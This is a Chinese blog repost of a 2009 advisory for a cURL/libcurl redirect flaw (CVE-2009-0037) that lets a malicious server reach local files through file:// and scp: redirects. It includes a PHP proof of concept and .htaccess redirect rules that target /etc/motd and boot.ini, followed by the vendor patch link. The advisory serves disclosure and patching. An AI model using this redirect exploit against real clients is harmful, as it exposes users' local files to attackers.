cURL/libcURL HTTP Location:重新定向绕过安全限制漏洞

最新推荐文章于 2024-01-19 13:28:44 发布
最新推荐文章于 2024-01-19 13:28:44 发布
阅读量1.5k 收藏
点赞数
分类专栏: PHP 文章标签: redirect http服务器 file .htaccess url header
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sahusoft/article/details/4387993
版权

发布日期:2009-03-03
更新日期:2009-03-04

受影响系统:

Daniel Stenberg curl 5.11 - 7.19.3

不受影响系统:

Daniel Stenberg curl 7.19.4

描述:

BUGTRAQID: 33962
CVE(CAN) ID: CVE-2009-0037

cURL是命令行传输文件工具,支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。

跟随HTTP Location:的cURL会重新定向到scp:或file:// URL,因此如果用户点击了特制的重新定向URL的话(例如libcurl客户端读取RSS源),恶意的HTTP服务器就可以覆盖或泄露任意本地文件系统的内容,或执行任意命令。

<*来源:David Kierznowski

链接:http://secunia.com/advisories/34138/
http://marc.info/?l=full-disclosure&m=123608232412287&q=p5
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
// This is an example of a vulnerable peice of PHP code
// If libcurl uses CURLOPT_FOLLOWLOCATION it could lead
// to arbitrary file access.
// The malicious redirect on withdk.com looks like this
// in .htaccess:
// # for Linux
// redirect 302 /test file:///etc/motd
// # for Win32
// redirect 302 /test file:///c:/boot.ini
// print_r ( curl_version() );
$c = new cc;
$c->fetch('http://withdk.com/malicious-redirect');
class cc {
function fetch($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$result1 = curl_exec($ch);
echo $result1;
curl_close($ch);
}
}
?>

建议:

厂商补丁:

Daniel Stenberg
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://curl.haxx.se/download/curl-7.19.4.zip

sahusoft
关注
专栏目录
服务器HTTP响应头安全性优化与漏洞修复方案
Bertram的博客
08-09 343
服务器HTTP响应头安全性优化与漏洞修复方案
漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)
Q先生
11-15 1940
漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)
24 年了,终于有人发现 curl 的这个 Bug 了
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
03-27 359
curl 作者 Daniel Stenberg 在个人博客分享了一个存在 23.9 年的 curl 漏洞curl 是常用的命令行工具,用来请求 Web 服务器,于 1997 年首次发行。据 Stenberg 透露,这个漏洞是在 curl 发布后的第 201 天引入的,但是直到第 8930 天,漏洞才修复好。一个持续了 23.9 年的漏洞背后有着怎样的故事?一切还得从 1998 年说起。curl ...
curl 身份认证绕过漏洞CVE-2023-27535)升级记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-08 786
curl在7.13.0-7.88.1版本中存在身份认证绕过漏洞libcurl将重用之前所创建的FTP连接,即使一个或多个参数被更改,可能会使有效用户变得不一样,从而导致使用错误的凭据进行第二次传输。官网:http://curl.haxx.se/download/影响范围:curl 7.13.0 - 7.88.1。
掰开揉碎,讲讲这个已存在近24年的CURL漏洞
smellycat000的专栏
09-08 882
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士这是一个与cookie、Internet代码和一个CVE有关的故事。故事发生在很久以前,所以搬好小板凳,仔细听好。当然,场景时候curl,它是与我工作有关的互联网传输工具和库。1998年1998年,我们推出curl 4.9。在那个年代,少有人听说过或用过curl。距离curl 网站宣布某个新发布的下载量达到300次还有几个月的时间要过。当时,cu...
libcurl linux 静态链接库_嵌入式 Linux下编译并使用curl静态库
weixin_39811101的博客
12-22 647
#x86./configure --disable-shared --enable-static --disable-ftp --disable-ipv6 --disable-rtsp --disable-tftp --disable-telnet --disable-largefile --disable-smtp --disable-imap --without-ssl --without-l...
微信开发之Curl
weixin_45566885的博客
11-28 633
1.什么是curl? Curl其实就是模拟浏览器请求的工具,比如获取远程的网页和接口 在微信开发过程当中: 使用开发模式创建微信自定义菜单,需要模拟HTTPS的 POST请求,这里就需要使用PHP的curl函数。 另外好多接口也要用到curl函数,因此curl函数是微信开发的基础,必须熟练掌握。 2.学习内容 1、curl函数基础 2、curl函数模拟GET 3、curl函数处理GET数据 4、c...
【php curl】php中curl的详解
编程哲学家的专栏
01-17 1003
本文我来给大家详细介绍下cURL的简单的使用方法,下文我将会给大家详细介绍cURL的高级应用, 好,废话不多说,我们先来认识下什么是cURL,可能还有很多同学没有听说过这个工具,我先来给大家简单介绍下什么是cURLcURL可以使用URL的语法模拟浏览器来传输数据, 因为它是模拟浏览器,因此它同样支持多种协议, FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DI...
最新kali之curl(二)
vanony的博客
01-23 853
描述:   传送网址。   curl是一个工具,使用支持的协议(DICT、FILE、FTP、FTPS、GOPHER、HTTPHTTPS、IMAP、IMAPS、LDAP、LDAPS、MQTT、POP3、POP3S、RTMP、RTMPS、RTSP、SCP、SFTP、SMB、SMBS、SMTP、SMTPS、TELNET和TFTP)从服务器传输数据。该命令被设计为无需用户交互即可工作。   curl提供了大量有用的技巧,如代理支持、用户身份验证、FTP上传、HTTP post、SSL连接、cookie、文件传输恢
php curl使用方法及相关参数说明
wyisgoodman的博客
01-08 533
php建立curl基本方法 /** * curl通用方法,可发送get请求和post请求 * @param $post * @param $url * @param string $type * @param array $header * @param bool $isUserAgent * @return bool|mixed|string */ function curlResult($post,$url,$type = 'POST', $cookie = '', $header =
curl&libcurl存在缓冲区溢出高危漏洞 (CVE-2023-38545)解决
qq_40619119的博客
10-13 4323
目前该漏洞只影响libcurl 7.69.0 ~ 8.3.0版本,不受漏洞影响的版本:libcurl < 7.69.0 和 >= 8.4.0。
php 禁止 curl,如何防止使用PHP cURL定向
weixin_30029951的博客
03-10 849
我正在开发一个表单,其中要求将收集的数据提交到第三方网站,格式为:http://www.domain.com/page?key=value&key2=value2我决定使用cURL,因为我还没有找到让我信服的替代品.我正在运行的问题是,一旦提交表单,就会执行cURL,但我将被重定向到我指定的域.相反,我想将用户重定向到我的域内的确认页面而不是第三方网站.这是我正在使用的代码示例:$URL=...
CentOS7.6下升级curl版本至8.5.0(漏洞修复)
最新发布
weixin_58949710的博客
01-19 2130
CentOS 7.6系统的curl 版本太老了,存在curl 安全漏洞CVE-2022-32221、CVE-2022-27778,所以要升级程序进行修复。
禁止linux curl抓取页面内容,curl抓取页面时遇到重定向的解决方法
weixin_32687875的博客
05-07 693
用php的curl抓取网页遇到了问题,为阐述方便,将代码简化如下:function curlGet($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, true);return...
HTTP协议相关漏洞
qq_48904485的博客
03-22 9448
一、HTTP协议 HTTP是一个基于请求与响应模式的、无状态的应用层协议。 请求响应   客户端要向web服务器发送一个请求以后,等待服务器回送http响应消息。 无状态   http协议整个过程当中的各种信息不会被服务器所记录下来。 常基于TCP的连接方式 ,即http是将数据打包成TCP数据包来进行传送的,绝大多数Web应用,都是构建在HTTP协议之上,即目前使用浏览器访问web网站都是以http协议为标准的。 1、HTTP协议的方法 GET :请求获取Request-URI所标识的资源 POST :
Web安全之服务端请求伪造漏洞
qq_52358808的博客
09-26 1950
服务端请求伪造(SSRF)漏洞 SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形成由服务器端发起请求的一种漏洞。从客户端发起一个请求到服务端,服务端再向另外的服务端发起请求的过程称之为服务器端请求。让服务器去请求你通常请求不到的东西。一般用来在外网探测或攻击内网服务。 常见类型 有回显:从页面中可以看到返回内容。 无回显:无法从页面中看到返回内容。 SSFRF漏洞1.原理1.1.成因1.2.场景1.3.相关函数2.利用3.危害4.防御 1.原理 .
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1420
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 948
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
curl/curl.h: no such file or
09-14
If you're getting the error message "curl/curl.h: no such file or directory" while compiling your code, it means that the compiler cannot find the header file for the Curl library. To resolve this ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值